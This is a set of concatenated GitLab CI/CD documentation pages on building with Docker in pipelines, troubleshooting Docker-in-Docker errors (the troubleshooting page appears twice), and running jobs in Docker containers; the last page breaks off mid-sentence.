file](https://gitlab.com/gitlab-org/charts/gitlab-runner/-/blob/00c1a2098f303dffb910714752e9a981e119f5b5/values.yaml#L133-137) by using [Helm chart](https://docs.gitlab.com/runner/install/kubernetes.html). ```yaml runners: tags: "kubernetes-windows-runner" config: | [[runners]] executor = "kubernetes" # The FF_USE_POWERSHELL_PATH_RESOLVER feature flag has to be enabled for PowerShell # to resolve paths for Windows correctly when Runner is operating in a Linux environment # but targeting Windows nodes. [runners.feature_flags] FF_USE_POWERSHELL_PATH_RESOLVER = true [runners.kubernetes] [[runners.kubernetes.volumes.host_path]] host_path = '\\.\pipe\docker_engine' mount_path = '\\.\pipe\docker_engine' name = 'docker-pipe' read_only = true [runners.kubernetes.node_selector] "kubernetes.io/arch" = "amd64" "kubernetes.io/os" = "windows" "node.kubernetes.io/windows-build" = "10.0.20348" ``` 1. Use Docker in the job script: ```yaml default: image: docker:25-windowsservercore-ltsc2022 before_script: - docker version - docker info build: stage: build tags: - kubernetes-windows-runner script: - docker build -t my-docker-image . - docker run my-docker-image /script/to/run/tests ``` ##### Known issues with AWS EKS Kubernetes cluster When you migrate from `dockerd` to `containerd`, the AWS EKS bootstrapping script `Start-EKSBootstrap.ps1` stops and disables the Docker Service. To work around this issue, rename the Docker Service after you [Install Docker Community Edition (CE) on Windows Server](https://learn.microsoft.com/en-us/virtualization/windowscontainers/quick-start/set-up-environment?tabs=dockerce#windows-server-1) with this script: ```powershell Write-Output "Rename the just installed Docker Engine Service from docker to dockerd" Write-Output "because the Start-EKSBootstrap.ps1 stops and disables the docker Service as part of migration from dockerd to containerd" Stop-Service -Name docker dockerd --register-service --service-name dockerd Start-Service -Name dockerd Write-Output "Ready to do Docker pipe binding on Windows EKS Node! :-)" ``` #### Known issues with Docker pipe binding Docker pipe binding has the same set of security and isolation issues as the [Known issues with Docker socket binding](#known-issues-with-docker-socket-binding). ## Enable registry mirror for `docker:dind` service When the Docker daemon starts inside the service container, it uses the default configuration. You might want to configure a [registry mirror](https://docs.docker.com/docker-hub/mirror/) for performance improvements and to ensure you do not exceed Docker Hub rate limits. ### The service in the `.gitlab-ci.yml` file You can append extra CLI flags to the `dind` service to set the registry mirror: ```yaml services: - name: docker:24.0.5-dind command: ["--registry-mirror", "https://registry-mirror.example.com"] # Specify the registry mirror to use ``` ### The service in the GitLab Runner configuration file If you are a GitLab Runner administrator, you can specify the `command` to configure the registry mirror for the Docker daemon. The `dind` service must be defined for the [Docker](https://docs.gitlab.com/runner/configuration/advanced-configuration.html#the-runnersdockerservices-section) or [Kubernetes executor](https://docs.gitlab.com/runner/executors/kubernetes/#define-a-list-of-services). Docker: ```toml [[runners]] ... executor = "docker" [runners.docker] ... privileged = true [[runners.docker.services]] name = "docker:24.0.5-dind" command = ["--registry-mirror", "https://registry-mirror.example.com"] ``` Kubernetes: ```toml [[runners]] ... name = "kubernetes" [runners.kubernetes] ... privileged = true [[runners.kubernetes.services]] name = "docker:24.0.5-dind" command = ["--registry-mirror", "https://registry-mirror.example.com"] ``` ### The Docker executor in the GitLab Runner configuration file If you are a GitLab Runner administrator, you can use the mirror for every `dind` service. Update the [configuration](https://docs.gitlab.com/runner/configuration/advanced-configuration.html) to specify a [volume mount](https://docs.gitlab.com/runner/configuration/advanced-configuration.html#volumes-in-the-runnersdocker-section). For example, if you have a `/opt/docker/daemon.json` file with the following content: ```json { "registry-mirrors": [ "https://registry-mirror.example.com" ] } ``` Update the `config.toml` file to mount the file to `/etc/docker/daemon.json`. This mounts the file for **every** container created by GitLab Runner. The configuration is detected by the `dind` service. ```toml [[runners]] ... executor = "docker" [runners.docker] image = "alpine:3.12" privileged = true volumes = ["/opt/docker/daemon.json:/etc/docker/daemon.json:ro"] ``` ### The Kubernetes executor in the GitLab Runner configuration file If you are a GitLab Runner administrator, you can use the mirror for every `dind` service. Update the [configuration](https://docs.gitlab.com/runner/configuration/advanced-configuration.html) to specify a [ConfigMap volume mount](https://docs.gitlab.com/runner/executors/kubernetes/#configmap-volume). For example, if you have a `/tmp/daemon.json` file with the following content: ```json { "registry-mirrors": [ "https://registry-mirror.example.com" ] } ``` Create a [ConfigMap](https://kubernetes.io/docs/concepts/configuration/configmap/) with the content of this file. You can do this with a command like: ```shell kubectl create configmap docker-daemon --namespace gitlab-runner --from-file /tmp/daemon.json ``` {{< alert type="note" >}} You must use the namespace that the Kubernetes executor for GitLab Runner uses to create job pods. {{< /alert >}} After the ConfigMap is created, you can update the `config.toml` file to mount the file to `/etc/docker/daemon.json`. This update mounts the file for **every** container created by GitLab Runner. The `dind` service detects this configuration. ```toml [[runners]] ... executor = "kubernetes" [runners.kubernetes] image = "alpine:3.12" privileged = true [[runners.kubernetes.volumes.config_map]] name = "docker-daemon" mount_path = "/etc/docker/daemon.json" sub_path = "daemon.json" ``` ## Authenticate with registry in Docker-in-Docker When you use Docker-in-Docker, the [standard authentication methods](using_docker_images.md#access-an-image-from-a-private-container-registry) do not work, because a fresh Docker daemon is started with the service. You should [authenticate with registry](authenticate_registry.md). ## Make Docker-in-Docker builds faster with Docker layer caching When using Docker-in-Docker, Docker downloads all layers of your image every time you create a build. You can [make your builds faster with Docker layer caching](docker_layer_caching.md). ## Use the OverlayFS driver {{< alert type="note" >}} The instance runners on GitLab.com use the `overlay2` driver by default. {{< /alert >}} By default, when using `docker:dind`, Docker uses the `vfs` storage driver, which copies the file system on every run. You can avoid this disk-intensive operation by using a different driver, for example `overlay2`. ### Requirements 1. Ensure a recent kernel is used, preferably `>= 4.2`. 1. Check whether the `overlay` module is loaded: ```shell sudo lsmod | grep overlay ``` If you see no result, then the module is not loaded. To load the module, use: ```shell sudo modprobe overlay ``` If the module loaded, you must make sure the module loads on reboot. On Ubuntu systems, do this by adding the following line to `/etc/modules`: ```plaintext overlay ``` ### Use the OverlayFS driver per project You can enable the driver for each project individually by using the `DOCKER_DRIVER` [CI/CD variable](../yaml/_index.md#variables) in `.gitlab-ci.yml`: ```yaml variables: DOCKER_DRIVER: overlay2 ``` ### Use the OverlayFS driver for every project If you use your own [runners](https://docs.gitlab.com/runner/), you can enable the driver for every project by setting the `DOCKER_DRIVER` environment variable in the [`[[runners]]` section of the `config.toml` file](https://docs.gitlab.com/runner/configuration/advanced-configuration.html#the-runners-section): ```toml environment = ["DOCKER_DRIVER=overlay2"] ``` If you're running multiple runners, you must modify all configuration files. Read more about the [runner configuration](https://docs.gitlab.com/runner/configuration/) and [using the OverlayFS storage driver](https://docs.docker.com/storage/storagedriver/overlayfs-driver/). ## Docker alternatives You can build container images without enabling privileged mode on your runner: - [BuildKit](using_buildkit.md): Includes rootless BuildKit options that eliminate Docker daemon dependency. - [Buildah](#buildah-example): Build OCI-compliant images without requiring a Docker daemon. ### Buildah example To use Buildah with GitLab CI/CD, you need [a runner](https://docs.gitlab.com/runner/) with one of the following executors: - [Kubernetes](https://docs.gitlab.com/runner/executors/kubernetes/). - [Docker](https://docs.gitlab.com/runner/executors/docker.html). - [Docker Machine](https://docs.gitlab.com/runner/executors/docker_machine.html). In this example, you use Buildah to: 1. Build a Docker image. 1. Push it to [GitLab container registry](../../user/packages/container_registry/_index.md). In the last step, Buildah uses the `Dockerfile` under the root directory of the project to build the Docker image. Finally, it pushes the image to the project's container registry: ```yaml build: stage: build image: quay.io/buildah/stable variables: # Use vfs with buildah. Docker offers overlayfs as a default, but Buildah # cannot stack overlayfs on top of another overlayfs filesystem. STORAGE_DRIVER: vfs # Write all image metadata in the docker format, not the standard OCI format. # Newer versions of docker can handle the OCI format, but older versions, like # the one shipped with Fedora 30, cannot handle the format. BUILDAH_FORMAT: docker FQ_IMAGE_NAME: "$CI_REGISTRY_IMAGE/test" before_script: # GitLab container registry credentials taken from the # [predefined CI/CD variables](../variables/_index.md#predefined-cicd-variables) # to authenticate to the registry. - echo "$CI_REGISTRY_PASSWORD" | buildah login -u "$CI_REGISTRY_USER" --password-stdin $CI_REGISTRY script: - buildah images - buildah build -t $FQ_IMAGE_NAME - buildah images - buildah push $FQ_IMAGE_NAME ``` If you are using GitLab Runner Operator deployed to an OpenShift cluster, try the [tutorial for using Buildah to build images in rootless container](buildah_rootless_tutorial.md). ## Use the GitLab container registry After you've built a Docker image, you can push it to the [GitLab container registry](../../user/packages/container_registry/build_and_push_images.md#use-gitlab-cicd). ## Troubleshooting ### `open //./pipe/docker_engine: The system cannot find the file specified` The following error might appear when you run a `docker` command in the PowerShell script to access the mounted Docker pipe: ```powershell PS C:\> docker version Client: Version: 25.0.5 API version: 1.44 Go version: go1.21.8 Git commit: 5dc9bcc Built: Tue Mar 19 15:06:12 2024 OS/Arch: windows/amd64 Context: default error during connect: this error may indicate that the docker daemon is not running: Get "http://%2F%2F.%2Fpipe%2Fdocker_engine/v1.44/version": open //./pipe/docker_engine: The system cannot find the file specified. ``` The error indicates that the Docker Engine is not running on the Windows EKS Node and the Docker pipe binding could not be used in the Windows-based Executor container. To solve the problem, use the workaround described in [Use the Kubernetes executor with Docker pipe binding](#use-the-kubernetes-executor-with-docker-pipe-binding).
https://docs.gitlab.com/ci/docker_build_troubleshooting
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/docker_build_troubleshooting.md
2025-08-13
doc/ci/docker
[ "doc", "ci", "docker" ]
docker_build_troubleshooting.md
Verify
Pipeline Execution
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Troubleshooting Docker Build
null
## Error: `docker: Cannot connect to the Docker daemon at tcp://docker:2375` This error is common when you are using [Docker-in-Docker](using_docker_build.md#use-docker-in-docker) v19.03 or later: ```plaintext docker: Cannot connect to the Docker daemon at tcp://docker:2375. Is the docker daemon running? ``` This error occurs because Docker starts on TLS automatically. - If this is your first time setting it up, see [use the Docker executor with the Docker image](using_docker_build.md#use-docker-in-docker). - If you are upgrading from v18.09 or earlier, see the [upgrade guide](https://about.gitlab.com/blog/2019/07/31/docker-in-docker-with-docker-19-dot-03/). This error can also occur with the [Kubernetes executor](https://docs.gitlab.com/runner/executors/kubernetes/#using-dockerdind) when attempts are made to access the Docker-in-Docker service before it has fully started up. For a more detailed explanation, see [issue 27215](https://gitlab.com/gitlab-org/gitlab-runner/-/issues/27215). ## Docker `no such host` error You might get an error that says `docker: error during connect: Post https://docker:2376/v1.40/containers/create: dial tcp: lookup docker on x.x.x.x:53: no such host`. This issue can occur when the service's image name [includes a registry hostname](../services/_index.md#available-settings-for-services). For example: ```yaml default: image: docker:24.0.5 services: - registry.hub.docker.com/library/docker:24.0.5-dind ``` A service's hostname is [derived from the full image name](../services/_index.md#accessing-the-services). However, the shorter service hostname `docker` is expected. To allow service resolution and access, add an explicit alias for the service name `docker`: ```yaml default: image: docker:24.0.5 services: - name: registry.hub.docker.com/library/docker:24.0.5-dind alias: docker ``` ## Error: `Cannot connect to the Docker daemon at unix:///var/run/docker.sock` You might get the following error when trying to run a `docker` command to access a `dind` service: ```shell $ docker ps Cannot connect to the Docker daemon at unix:///var/run/docker.sock. Is the docker daemon running? ``` Make sure your job has defined these environment variables: - `DOCKER_HOST` - `DOCKER_TLS_CERTDIR` (optional) - `DOCKER_TLS_VERIFY` (optional) You may also want to update the image that provides the Docker client. For example, the [`docker/compose` images are obsolete](https://hub.docker.com/r/docker/compose) and should be replaced with [`docker`](https://hub.docker.com/_/docker). As described in [runner issue 30944](https://gitlab.com/gitlab-org/gitlab-runner/-/issues/30944#note_1514250909), this error can happen if your job previously relied on environment variables derived from the deprecated [Docker `--link` parameter](https://docs.docker.com/network/links/#environment-variables), such as `DOCKER_PORT_2375_TCP`. Your job fails with this error if: - Your CI/CD image relies on a legacy variable, such as `DOCKER_PORT_2375_TCP`. - The [runner feature flag `FF_NETWORK_PER_BUILD`](https://docs.gitlab.com/runner/configuration/feature-flags.html) is set to `true`. - `DOCKER_HOST` is not explicitly set. ## Error: `unauthorized: incorrect username or password` This error appears when you use the deprecated variable, `CI_BUILD_TOKEN`: ```plaintext Error response from daemon: Get "https://registry-1.docker.io/v2/": unauthorized: incorrect username or password ``` To prevent users from receiving this error, you should: - Use [CI_JOB_TOKEN](../jobs/ci_job_token.md) instead. - Change from `gitlab-ci-token/CI_BUILD_TOKEN` to `$CI_REGISTRY_USER/$CI_REGISTRY_PASSWORD`. ## Error during connect: `no such host` This error appears when the `dind` service has failed to start: ```plaintext error during connect: Post "https://docker:2376/v1.24/auth": dial tcp: lookup docker on 127.0.0.11:53: no such host ``` Check the job log to see if `mount: permission denied (are you root?)` appears. For example: ```plaintext Service container logs: 2023-08-01T16:04:09.541703572Z Certificate request self-signature ok 2023-08-01T16:04:09.541770852Z subject=CN = docker:dind server 2023-08-01T16:04:09.556183222Z /certs/server/cert.pem: OK 2023-08-01T16:04:10.641128729Z Certificate request self-signature ok 2023-08-01T16:04:10.641173149Z subject=CN = docker:dind client 2023-08-01T16:04:10.656089908Z /certs/client/cert.pem: OK 2023-08-01T16:04:10.659571093Z ip: can't find device 'ip_tables' 2023-08-01T16:04:10.660872131Z modprobe: can't change directory to '/lib/modules': No such file or directory 2023-08-01T16:04:10.664620455Z mount: permission denied (are you root?) 2023-08-01T16:04:10.664692175Z Could not mount /sys/kernel/security. 2023-08-01T16:04:10.664703615Z AppArmor detection and --privileged mode might break. 2023-08-01T16:04:10.665952353Z mount: permission denied (are you root?) ``` This indicates the GitLab Runner does not have permission to start the `dind` service: 1. Check that `privileged = true` is set in the `config.toml`. 1. Make sure the CI job has the right Runner tags to use these privileged runners. ## Error: `cgroups: cgroup mountpoint does not exist: unknown` There is a known incompatibility introduced by Docker Engine 20.10. When the host uses Docker Engine 20.10 or later, then the `docker:dind` service in a version older than 20.10 does not work as expected. While the service itself will start without problems, trying to build the container image results in the error: ```plaintext cgroups: cgroup mountpoint does not exist: unknown ``` To resolve this issue, update the `docker:dind` container to version at least 20.10.x, for example `docker:24.0.5-dind`. The opposite configuration (`docker:24.0.5-dind` service and Docker Engine on the host in version 19.06.x or older) works without problems. For the best strategy, you should to frequently test and update job environment versions to the newest. This brings new features, improved security and - for this specific case - makes the upgrade on the underlying Docker Engine on the runner's host transparent for the job. ## Error: `failed to verify certificate: x509: certificate signed by unknown authority` This error can appear when Docker commands like `docker build` or `docker pull` are executed in a Docker-in-Docker environment where custom or private certificates are used (for example, Zscaler certificates): ```plaintext error pulling image configuration: download failed after attempts=6: tls: failed to verify certificate: x509: certificate signed by unknown authority ``` This error occurs because Docker commands in a Docker-in-Docker environment use two separate containers: - The **build container** runs the Docker client (`/usr/bin/docker`) and executes your job's script commands. - The **service container** (often named `svc`) runs the Docker daemon that processes most Docker commands. When your organization uses custom certificates, both containers need these certificates. Without proper certificate configuration in both containers, Docker operations that connect to external registries or services will fail with certificate errors. To resolve this issue: 1. Store your root certificate as a [CI/CD variable](../variables/_index.md#define-a-cicd-variable-in-the-ui) named `CA_CERTIFICATE`. The certificate should be in this format: ```plaintext -----BEGIN CERTIFICATE----- (certificate content) -----END CERTIFICATE----- ``` 1. Configure your pipeline to install the certificate in the service container before starting the Docker daemon. For example: ```yaml image_build: stage: build image: name: docker:19.03 variables: DOCKER_HOST: tcp://localhost:2375 DOCKER_TLS_CERTDIR: "" CA_CERTIFICATE: "$CA_CERTIFICATE" services: - name: docker:19.03-dind command: - /bin/sh - -c - | echo "$CA_CERTIFICATE" > /usr/local/share/ca-certificates/custom-ca.crt && \ update-ca-certificates && \ dockerd-entrypoint.sh || exit script: - docker info - docker login -u $DOCKER_USERNAME -p $DOCKER_PASSWORD $DOCKER_REGISTRY - docker build -t "${DOCKER_REGISTRY}/my-app:${CI_COMMIT_REF_NAME}" . - docker push "${DOCKER_REGISTRY}/my-app:${CI_COMMIT_REF_NAME}" ```
--- stage: Verify group: Pipeline Execution info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Troubleshooting Docker Build breadcrumbs: - doc - ci - docker --- ## Error: `docker: Cannot connect to the Docker daemon at tcp://docker:2375` This error is common when you are using [Docker-in-Docker](using_docker_build.md#use-docker-in-docker) v19.03 or later: ```plaintext docker: Cannot connect to the Docker daemon at tcp://docker:2375. Is the docker daemon running? ``` This error occurs because Docker starts on TLS automatically. - If this is your first time setting it up, see [use the Docker executor with the Docker image](using_docker_build.md#use-docker-in-docker). - If you are upgrading from v18.09 or earlier, see the [upgrade guide](https://about.gitlab.com/blog/2019/07/31/docker-in-docker-with-docker-19-dot-03/). This error can also occur with the [Kubernetes executor](https://docs.gitlab.com/runner/executors/kubernetes/#using-dockerdind) when attempts are made to access the Docker-in-Docker service before it has fully started up. For a more detailed explanation, see [issue 27215](https://gitlab.com/gitlab-org/gitlab-runner/-/issues/27215). ## Docker `no such host` error You might get an error that says `docker: error during connect: Post https://docker:2376/v1.40/containers/create: dial tcp: lookup docker on x.x.x.x:53: no such host`. This issue can occur when the service's image name [includes a registry hostname](../services/_index.md#available-settings-for-services). For example: ```yaml default: image: docker:24.0.5 services: - registry.hub.docker.com/library/docker:24.0.5-dind ``` A service's hostname is [derived from the full image name](../services/_index.md#accessing-the-services). However, the shorter service hostname `docker` is expected. To allow service resolution and access, add an explicit alias for the service name `docker`: ```yaml default: image: docker:24.0.5 services: - name: registry.hub.docker.com/library/docker:24.0.5-dind alias: docker ``` ## Error: `Cannot connect to the Docker daemon at unix:///var/run/docker.sock` You might get the following error when trying to run a `docker` command to access a `dind` service: ```shell $ docker ps Cannot connect to the Docker daemon at unix:///var/run/docker.sock. Is the docker daemon running? ``` Make sure your job has defined these environment variables: - `DOCKER_HOST` - `DOCKER_TLS_CERTDIR` (optional) - `DOCKER_TLS_VERIFY` (optional) You may also want to update the image that provides the Docker client. For example, the [`docker/compose` images are obsolete](https://hub.docker.com/r/docker/compose) and should be replaced with [`docker`](https://hub.docker.com/_/docker). As described in [runner issue 30944](https://gitlab.com/gitlab-org/gitlab-runner/-/issues/30944#note_1514250909), this error can happen if your job previously relied on environment variables derived from the deprecated [Docker `--link` parameter](https://docs.docker.com/network/links/#environment-variables), such as `DOCKER_PORT_2375_TCP`. Your job fails with this error if: - Your CI/CD image relies on a legacy variable, such as `DOCKER_PORT_2375_TCP`. - The [runner feature flag `FF_NETWORK_PER_BUILD`](https://docs.gitlab.com/runner/configuration/feature-flags.html) is set to `true`. - `DOCKER_HOST` is not explicitly set. ## Error: `unauthorized: incorrect username or password` This error appears when you use the deprecated variable, `CI_BUILD_TOKEN`: ```plaintext Error response from daemon: Get "https://registry-1.docker.io/v2/": unauthorized: incorrect username or password ``` To prevent users from receiving this error, you should: - Use [CI_JOB_TOKEN](../jobs/ci_job_token.md) instead. - Change from `gitlab-ci-token/CI_BUILD_TOKEN` to `$CI_REGISTRY_USER/$CI_REGISTRY_PASSWORD`. ## Error during connect: `no such host` This error appears when the `dind` service has failed to start: ```plaintext error during connect: Post "https://docker:2376/v1.24/auth": dial tcp: lookup docker on 127.0.0.11:53: no such host ``` Check the job log to see if `mount: permission denied (are you root?)` appears. For example: ```plaintext Service container logs: 2023-08-01T16:04:09.541703572Z Certificate request self-signature ok 2023-08-01T16:04:09.541770852Z subject=CN = docker:dind server 2023-08-01T16:04:09.556183222Z /certs/server/cert.pem: OK 2023-08-01T16:04:10.641128729Z Certificate request self-signature ok 2023-08-01T16:04:10.641173149Z subject=CN = docker:dind client 2023-08-01T16:04:10.656089908Z /certs/client/cert.pem: OK 2023-08-01T16:04:10.659571093Z ip: can't find device 'ip_tables' 2023-08-01T16:04:10.660872131Z modprobe: can't change directory to '/lib/modules': No such file or directory 2023-08-01T16:04:10.664620455Z mount: permission denied (are you root?) 2023-08-01T16:04:10.664692175Z Could not mount /sys/kernel/security. 2023-08-01T16:04:10.664703615Z AppArmor detection and --privileged mode might break. 2023-08-01T16:04:10.665952353Z mount: permission denied (are you root?) ``` This indicates the GitLab Runner does not have permission to start the `dind` service: 1. Check that `privileged = true` is set in the `config.toml`. 1. Make sure the CI job has the right Runner tags to use these privileged runners. ## Error: `cgroups: cgroup mountpoint does not exist: unknown` There is a known incompatibility introduced by Docker Engine 20.10. When the host uses Docker Engine 20.10 or later, then the `docker:dind` service in a version older than 20.10 does not work as expected. While the service itself will start without problems, trying to build the container image results in the error: ```plaintext cgroups: cgroup mountpoint does not exist: unknown ``` To resolve this issue, update the `docker:dind` container to version at least 20.10.x, for example `docker:24.0.5-dind`. The opposite configuration (`docker:24.0.5-dind` service and Docker Engine on the host in version 19.06.x or older) works without problems. For the best strategy, you should to frequently test and update job environment versions to the newest. This brings new features, improved security and - for this specific case - makes the upgrade on the underlying Docker Engine on the runner's host transparent for the job. ## Error: `failed to verify certificate: x509: certificate signed by unknown authority` This error can appear when Docker commands like `docker build` or `docker pull` are executed in a Docker-in-Docker environment where custom or private certificates are used (for example, Zscaler certificates): ```plaintext error pulling image configuration: download failed after attempts=6: tls: failed to verify certificate: x509: certificate signed by unknown authority ``` This error occurs because Docker commands in a Docker-in-Docker environment use two separate containers: - The **build container** runs the Docker client (`/usr/bin/docker`) and executes your job's script commands. - The **service container** (often named `svc`) runs the Docker daemon that processes most Docker commands. When your organization uses custom certificates, both containers need these certificates. Without proper certificate configuration in both containers, Docker operations that connect to external registries or services will fail with certificate errors. To resolve this issue: 1. Store your root certificate as a [CI/CD variable](../variables/_index.md#define-a-cicd-variable-in-the-ui) named `CA_CERTIFICATE`. The certificate should be in this format: ```plaintext -----BEGIN CERTIFICATE----- (certificate content) -----END CERTIFICATE----- ``` 1. Configure your pipeline to install the certificate in the service container before starting the Docker daemon. For example: ```yaml image_build: stage: build image: name: docker:19.03 variables: DOCKER_HOST: tcp://localhost:2375 DOCKER_TLS_CERTDIR: "" CA_CERTIFICATE: "$CA_CERTIFICATE" services: - name: docker:19.03-dind command: - /bin/sh - -c - | echo "$CA_CERTIFICATE" > /usr/local/share/ca-certificates/custom-ca.crt && \ update-ca-certificates && \ dockerd-entrypoint.sh || exit script: - docker info - docker login -u $DOCKER_USERNAME -p $DOCKER_PASSWORD $DOCKER_REGISTRY - docker build -t "${DOCKER_REGISTRY}/my-app:${CI_COMMIT_REF_NAME}" . - docker push "${DOCKER_REGISTRY}/my-app:${CI_COMMIT_REF_NAME}" ```
https://docs.gitlab.com/ci/using_docker_images
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/using_docker_images.md
2025-08-13
doc/ci/docker
[ "doc", "ci", "docker" ]
using_docker_images.md
Verify
Runner
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Run your CI/CD jobs in Docker containers
Learn how to run your CI/CD jobs in Docker containers hosted on dedicated CI/CD build servers or your local machine.
{{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} You can run your CI/CD jobs in Docker containers hosted on dedicated CI/CD build servers or your local machine. To run CI/CD jobs in a Docker container, you need to: 1. Register a runner and configure it to use the [Docker executor](https://docs.gitlab.com/runner/executors/docker.html). 1. Specify the container image where you want to run the CI/CD jobs in the `.gitlab-ci.yml` file. 1. Optional. Run other services, like MySQL, in containers. Do this by specifying [services](../services/_index.md) in your `.gitlab-ci.yml` file. ## Register a runner that uses the Docker executor To use GitLab Runner with Docker you need to [register a runner](https://docs.gitlab.com/runner/register/) that uses the Docker executor. This example shows how to set up a temporary template to supply services: ```shell cat > /tmp/test-config.template.toml << EOF [[runners]] [runners.docker] [[runners.docker.services]] name = "postgres:latest" [[runners.docker.services]] name = "mysql:latest" EOF ``` Then use this template to register the runner: ```shell sudo gitlab-runner register \ --url "https://gitlab.example.com/" \ --token "$RUNNER_TOKEN" \ --description "docker-ruby:2.6" \ --executor "docker" \ --template-config /tmp/test-config.template.toml \ --docker-image ruby:3.3 ``` The registered runner uses the `ruby:2.6` Docker image and runs two services, `postgres:latest` and `mysql:latest`, both of which are accessible during the build process. ## What is an image The `image` keyword is the name of the Docker image the Docker executor uses to run CI/CD jobs. By default, the executor pulls images from [Docker Hub](https://hub.docker.com/). However, you can configure the registry location in the `gitlab-runner/config.toml` file. For example, you can set the [Docker pull policy](https://docs.gitlab.com/runner/executors/docker.html#how-pull-policies-work) to use local images. For more information about images and Docker Hub, see the [Docker overview](https://docs.docker.com/get-started/overview/). ## Image requirements Any image used to run a CI/CD job must have the following applications installed: - `sh` or `bash` - `grep` ## Define `image` in the `.gitlab-ci.yml` file You can define an image that's used for all jobs, and a list of services that you want to use during runtime: ```yaml default: image: ruby:2.6 services: - postgres:11.7 before_script: - bundle install test: script: - bundle exec rake spec ``` The image name must be in one of the following formats: - `image: <image-name>` (Same as using `<image-name>` with the `latest` tag) - `image: <image-name>:<tag>` - `image: <image-name>@<digest>` ## Extended Docker configuration options {{< history >}} - Introduced in GitLab and GitLab Runner 9.4. {{< /history >}} You can use a string or a map for the `image` or `services` entries: - Strings must include the full image name (including the registry, if you want to download the image from a registry other than Docker Hub). - Maps must contain at least the `name` option, which is the same image name as used for the string setting. For example, the following two definitions are equal: - A string for `image` and `services`: ```yaml image: "registry.example.com/my/image:latest" services: - postgresql:14.3 - redis:latest ``` - A map for `image` and `services`. The `image:name` is required: ```yaml image: name: "registry.example.com/my/image:latest" services: - name: postgresql:14.3 - name: redis:latest ``` ## Where scripts are executed When a CI job runs in a Docker container, the `before_script`, `script`, and `after_script` commands run in the `/builds/<project-path>/` directory. Your image may have a different default `WORKDIR` defined. To move to your `WORKDIR`, save the `WORKDIR` as an environment variable so you can reference it in the container during the job's runtime. ### Override the entrypoint of an image {{< history >}} - Introduced in GitLab and GitLab Runner 9.4. Read more about the [extended configuration options](using_docker_images.md#extended-docker-configuration-options). {{< /history >}} Before explaining the available entrypoint override methods, let's describe how the runner starts. It uses a Docker image for the containers used in the CI/CD jobs: 1. The runner starts a Docker container using the defined entrypoint. The default from `Dockerfile` that may be overridden in the `.gitlab-ci.yml` file. 1. The runner attaches itself to a running container. 1. The runner prepares a script (the combination of [`before_script`](../yaml/_index.md#before_script), [`script`](../yaml/_index.md#script), and [`after_script`](../yaml/_index.md#after_script)). 1. The runner sends the script to the container's shell `stdin` and receives the output. To override the [entrypoint](https://docs.gitlab.com/runner/executors/docker.html#configure-a-docker-entrypoint) of a Docker image, in the `.gitlab-ci.yml` file: - For Docker 17.06 and later, set `entrypoint` to an empty value. - For Docker 17.03 and earlier, set `entrypoint` to `/bin/sh -c`, `/bin/bash -c`, or an equivalent shell available in the image. The syntax of `image:entrypoint` is similar to [Dockerfile `ENTRYPOINT`](https://docs.docker.com/reference/dockerfile/#entrypoint). Let's assume you have a `super/sql:experimental` image with a SQL database in it. You want to use it as a base image for your job because you want to execute some tests with this database binary. Let's also assume that this image is configured with `/usr/bin/super-sql run` as an entrypoint. When the container starts without additional options, it runs the database's process. The runner expects that the image has no entrypoint or that the entrypoint is prepared to start a shell command. With the extended Docker configuration options, instead of: - Creating your own image based on `super/sql:experimental`. - Setting the `ENTRYPOINT` to a shell. - Using the new image in your CI job. You can now define an `entrypoint` in the `.gitlab-ci.yml` file. **For Docker 17.06 and later**: ```yaml image: name: super/sql:experimental entrypoint: [""] ``` **For Docker 17.03 and earlier**: ```yaml image: name: super/sql:experimental entrypoint: ["/bin/sh", "-c"] ``` ## Define image and services in `config.toml` In the `config.toml` file, you can define: - In the [`[runners.docker]`](https://docs.gitlab.com/runner/configuration/advanced-configuration#the-runnersdocker-section) section, the container image used to run CI/CD jobs - In the [`[[runners.docker.services]]`](https://docs.gitlab.com/runner/configuration/advanced-configuration#the-runnersdockerservices-section) section, the [services](../services/_index.md) container ```toml [runners.docker] image = "ruby:latest" services = ["mysql:latest", "postgres:latest"] ``` The image and services defined this way are added to all jobs run by that runner. ## Access an image from a private container registry To access private container registries, the GitLab Runner process can use: - [Statically defined credentials](#use-statically-defined-credentials). A username and password for a specific registry. - [Credentials Store](#use-a-credentials-store). For more information, see [the relevant Docker documentation](https://docs.docker.com/reference/cli/docker/login/#credential-stores). - [Credential Helpers](#use-credential-helpers). For more information, see [the relevant Docker documentation](https://docs.docker.com/reference/cli/docker/login/#credential-helpers). When you use the [GitLab Container Registry](../../user/packages/container_registry/_index.md) on the same GitLab instance, GitLab provides default credentials for this registry. With these credentials, the `CI_JOB_TOKEN` is used for authentication. To use the job token, the user starting the job must have at least the Developer role for the project where the private image is hosted. The project hosting the private image must also allow the other project to authenticate with the job token. This access is disabled by default. For more details, see [CI/CD job token](../jobs/ci_job_token.md#control-job-token-access-to-your-project). To define which option should be used, the runner process reads the configuration in this order: - A `DOCKER_AUTH_CONFIG` [CI/CD variable](../variables/_index.md). - A `DOCKER_AUTH_CONFIG` environment variable set in the runner's `config.toml` file. - A `config.json` file in `$HOME/.docker` directory of the user running the process. If the `--user` flag is provided to run the child processes as unprivileged user, the home directory of the main runner process user is used. ### Requirements and limitations - [Credentials Store](#use-a-credentials-store) and [Credential Helpers](#use-credential-helpers) require binaries to be added to the GitLab Runner `$PATH`, and require access to do so. Therefore, these features are not available on instance runners, or any other runner where the user does not have access to the environment where the runner is installed. ### Use statically-defined credentials You can access a private registry using two approaches. Both require setting the CI/CD variable `DOCKER_AUTH_CONFIG` with appropriate authentication information. 1. Per-job: To configure one job to access a private registry, add `DOCKER_AUTH_CONFIG` as a [CI/CD variable](../variables/_index.md). 1. Per-runner: To configure a runner so all its jobs can access a private registry, add `DOCKER_AUTH_CONFIG` as an environment variable in the runner's configuration. See the following sections for examples of each. #### Determine your `DOCKER_AUTH_CONFIG` data As an example, let's assume you want to use the `registry.example.com:5000/private/image:latest` image. This image is private and requires you to sign in to a private container registry. Let's also assume that these are the sign-in credentials: | Key | Value | |:---------|:------| | registry | `registry.example.com:5000` | | username | `my_username` | | password | `my_password` | Use one of the following methods to determine the value for 